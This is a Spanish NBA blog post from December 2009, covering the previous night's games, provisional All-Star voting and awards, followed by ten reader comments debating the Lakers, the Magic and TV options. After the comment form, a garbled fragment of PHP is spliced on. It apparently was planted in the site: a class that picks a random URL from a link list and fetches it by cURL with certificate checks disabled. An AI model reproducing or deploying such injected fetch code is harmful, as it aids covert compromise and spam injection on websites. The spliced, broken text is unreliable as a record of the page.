La Crónica (10/12/09)

11 de December de 2009 por TheDeerHunter

Jornada de máximo interés, por los choques de alto stánding que se disputaban y por el primer recuento de votos provisional para el all-star de Dallas.

Los Celtics se libraron de la derrota en la capital con Rajon Rondo reivindicándose como líder ante, precísamente, Gilbert Arenas que le saca casi el doble de votos. Tenía cierta razón Arenas cuando dijo aquello de Calderon. Para este tipo de fiestas populares unos crían la fama y son otros los que cardan la lana. Por eso Arenas irá al all-star y no Rondo. El lugar del céltico no son los shows; son los partidos de máxima tensión donde él saca lo mejor de sí mismo. Otros fallan tontos tiros libres y pierden los partidos. En otro tema también parece tener razón Arenas. Algo le sucede a Butler… aunque no sepamos a ciencia cierta si es concretamente falta de compromiso.

En esto que alguien me explique cómo puede ser que Bargnani le saque el cuádruple de votos a Kedrick Perkins… o a Jermaine O’neal el doble. Anoche 16-11 en un partido casi perfecto. Ya véis lo que os comentamos.

Después vimos a Melo anotar 40 puntos en el Palace de Auburn Hills. Sin embargo Billups estuvo mal en la visita a sus ex y los Pistons bastante bien con Stuckey y Villanueva a la cabeza. Los errores puntuales de los Nuggets les costaron el partido.

En el último partido Orlando pareció querer intervenir en nuestro debate de ayer sobre quien está más en forma. Derrota en Utah para dejárnoslo más fácil. Vince 9 de 23, Howard con problemas de faltas, mal Lewis, fatal Pietrus y Bass y Gortat ni olerla. No son buenas sensaciones, desde luego.

Del recuento, podemos sacar algunas conclusiones eventuales bastante sorprendentes.

– TMac titular en el Oeste. Sería bastante fuerte ¿no?

– Los Hawks son los discriminados de la liga. Horford por detrás de Bargnani, Josh Smith por detrás de Bosh, Joe Johnson por detrás de todo cristo…

– Wade por delante de LeBron en el Este. No eran impresiones nuestras que “El Elegido” está en un mal momento mediático. A Roy le pasa algo parecido, ojo…

– Los Lakers es el equipo con más miembros entre los primeros y ¡Pau por delante de Tim Duncan!

PREMIOS

MVP: Me da igual que no le voten los aficionados o que no le eligan los entrenadores. Hace tiempo que Deron Williams tendría que haber disputado un All-Stars. Partidos como el de ayer lo ratifica: 32 puntos, 8 rebotes y 15 asistencias y victoria frente Orlando. ¡Crack!

Rookie: Aprovechando las bajas Jonas Jebreko sigue de titular y cumpliendo. 12 puntitos y 8 rebotes.

Sorpresa: Charlie Villanueva es bastante inconsistente pero de vez en cuando se marca partidazos como el de ayer. 27 puntos, 5 rebotes y 5 asistencias para el dominicano. Por su parte CJ Miles, ha vuelto en forma de la lesión. 22 puntos saliendo desde el banquillo.

Decepción: Seguramente falta mucho para que llegue su momento, pero partidos como el de ayer de Rasheed Wallace no son tolerables. 4 puntos sin ninguna canasta de campo. Pietrus, Lewis y los bases de los Magic también se cubrieron de gloria ayer…

Esfuerzo en vano: 40 puntitos con buenos porcentajes que no sirvieron para que Carmelo Anthony se llevara la victoria del pabellón de los Pistons.

RAZONES PARA TRASNOCHAR

11 partidos se juegan la próxima madrugada destacando por encima de todos el Dallas-Miami (1h30), el Orlando-Phoenix (4h30), el Portland-Cleveland (2h00) e incluso el Charlotte-San Antonio (2h30). A los Lakers se les presenta un fácil partido frente a Minnesota, igual que a Houston frente a Ivers… digo Philadelphia y a Atlanta frente Toronto. Al menos sobre el papel porque ya no pongo la mano en el fuego por nadie. Bueno, por Pau Gasol y los amarillos, sí.

Comenta

10 comentarios a esta entrada

  1. Txusma dice:
    #1

    Yo de momento confío más en Butler que en Arenas. Es decir, que no me extrañaría que el bajón en el juego de Caron viniese provocado por la vuelta de Gilbert a las canchas y no me refiero exclusivamente al ámbito deportivo porque no debe hacer mucha gracia que después de estar 2 años dejándote la piel venga la estrellita y te ponga a parir a las primeras de cambio.
    Y respecto al All-Stars yo ya digo que viendo las votaciones ya no dan ganas ni de verlo porque se rigen por parámetros tan subjetivos y de favoritismos que casi asquean. Bargnani tercer pivot del Este? Shaq el segundo por mucho que le vayan estos shows? Arenas el tercero por delante de Joe Johnson o Rondo? Deron Williams (esto clama al cielo) hundido en la clasificación? Amare el mejor pivot del Oeste? Al final siempre acabamos viendo a los mismos…

      Citar

  2. Love Denise dice:
    #2

    deer, respecto la forma de orlando, hice esta mañana un comentario en la cronica de ayer.
    Segun mi opinion, por muy bien que estén jugando los Lakers, todavía no conocemos su verdadera capacidad y forma, puesto que su calendario ha sido facilisimo y apenas se han enfrentado a rivales de entidad, sólo contra Denver y Phoenix, por no hablar que la mayoría de sus partidos han sido en casa.

      Citar

  3. Hynreck dice:
    #3

    TMac, TMac!!!!

    Yo tambien le he votado, que pasa? 😛

      Citar

  4. TheDeerHunter dice:
    #4

    Lo de Deron Williams es directamente para que cancelen el evento.

    @LD… apuntado queda. Que conste que yo fui uno de los que pensaba al principio de temporada que la plantilla de Orlando era la mejor sobre el papel.
    Pero: Duelo Jackson vs Van Gundy –> ni punto de comparación y esto se está notando especialmente.
    Duelo Kobe-Gasol-Bynum-Artest-Odom vs Howard-Lewis-Vince-Nelson-¿Pietrus? –> no hay color
    Duelo Fisher-Farmar-Brown-Walton vs Gortat-Anderson-Barnes-Redick-Williams-Bass-A.Johnson… lo ganaría de calle Orlando si no fuera por lo irregulares que se están mostrando… y lo poco eficaces que están siendo por momentos.

    Estoy sufriendo a Gortat,Anderson, Williams y Bass en mis lígas de verano. Se de lo que hablo porque apostaba mogollón por ellos.
    Gortat se quiere pirar, por cierto y hay que entenderle… A Bass no se lo hemos preguntado, pero nos lo podríamos imaginar.

      Citar

  5. Love Denise dice:
    #5

    Pues si es así, perfecto que se vaya Gortat, es verdad que el polaco ha cumplido con creces cuando Dwight se ha lesionado, es más, pienso que Gortat en otro equipo, jugando media hora, es un tipo que se va facilmente al 10-10- 2 tapones + intimidación. Pero para jugar 12 minutitos, no podemos tener ahí a un tío de 7 $, es que no hay alguno que por 2 $ haga el mismo trabajo que Gortat, aunque sea más malo si tuviera que jugar más minutos?
    Por cierto, no le vendrían mal ahora un Gortat a los Blazers, tras la lesion de Greg.
    Y lo dicho, evaluemos a los Lakers, cuando se haya enfrentado a algún “grande”, que hasta ahora, rivales facilitos y en casa.
    Saludos.

      Citar

  6. Viva_Dirk dice:
    #6

    Deron Williams ha tenido siempre una tremenda competencia para ir a All-Star, Kobe, Nash, Paul, Billups/Iverson y T-Mac, este año sin T-Mac y con Billups con peores números que él es el año para que lo elijan los entrenadores.

    Con Lebron pasa que sus capulladas estan empezando a cansar y su juego nunca ha sido el preferido de casi nadie.

    Coincido con Deer en lo de Orlando vs Lakers, salvo en que Ryan Anderson cuando juega ciertos minutos rinde muy bien.

      Citar

  7. TheDeerHunter dice:
    #7

    De acuerdo LD, los Lakers han jugado muchos partidos en casa, pero no te engañes que ellos y Orlando son posiblemente los favoritos que menos ventaja sacan de este factor.

    Lakers ha jugado contra Dallas, Atlanta, Houston (2 veces), Phoenix (2 veces), Miami y Utah.
    Orlando contra Phoenix, Cleveland, Boston, Miami, Atlanta y Utah…y para de contar.

    No aprecio grandes diferencias excepto el nivel que unos y otros despliegan. Todavía no he visto que Artest se tire el doble de tiros que Kobe, por ejemplo (y en Orlando sí he visto algo parecido, ojo)

      Citar

  8. Txusma dice:
    #8

    Me acabas de comparar a Artest con Carter, Deer?
    En los Lakers el orden parece claro: Kobe, Gasol, Bynum, Artest, Odom. Pero y en los Magic? En teoría sería Howard, Carter, Lewis, Nelson, no? O incluso Lewis debería tirar más que Carter?

      Citar

  9. Black Mamba dice:
    #9

    Hola.

    Hace tiempo que os sigo, ante todo enhorabuena, en mi opinión haceís el mejor blog de España sobre la NBA.

    Del all-star, me extraña la ausencia total de Carlos Boozer, creo que ha hecho un primer tramo de temporada magnífico.

    También quiero aprovechar para preguntaros, por que cadena de televisión seguís la NBA.

    Las opciones que yo conozco son estas:

    1.Digital+, en este momento soy abonado de la plataforma, muy buena calidad de las retransmisiones, pero me parece algo caro para los partidos que ofrecen. Para poder ver NBA a diario te obligan a abonarte a un paquete bastante caro

    2. NBA Pass. He leido malas y buenas opiniones sobre esta posibilidad, personalmente no me atrae puesto que soy algo cómodo, y más a esas horas de la madrugada, y prefiero ver la NBA en el sófá y no en el monítor del ordenador.

    3. Al Jazeera Sport. Por ahora es la opcion que más me convence. El abono para un año sale por los 100 € y te ofrecen unos 15 directos semanales, además de NBA TV y ESPN. Pegas: La calidad de imagen es inferior a la de digital + y el formato de los partidos 4:3, además del idioma (árabe o inglés).

    Me gustaría saber si existe otra forma para seguir ver cuantos más directos mejor de NBA y que no se me vaya de presupuesto.

    Saludos.

      Citar

  10. Jabho dice:
    #10

    Por aportar algo al debate los Lakers llevan 16 de los 20 partidos en casa que es de largo el que más de la liga y nada de viajes largos, que llegaran.

    Ahora mismo el nivel de los Lakers desde que regresó Gasol es muy, muy alto. Veremos si son capaces de mantenerlo pero por ahora asustan…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>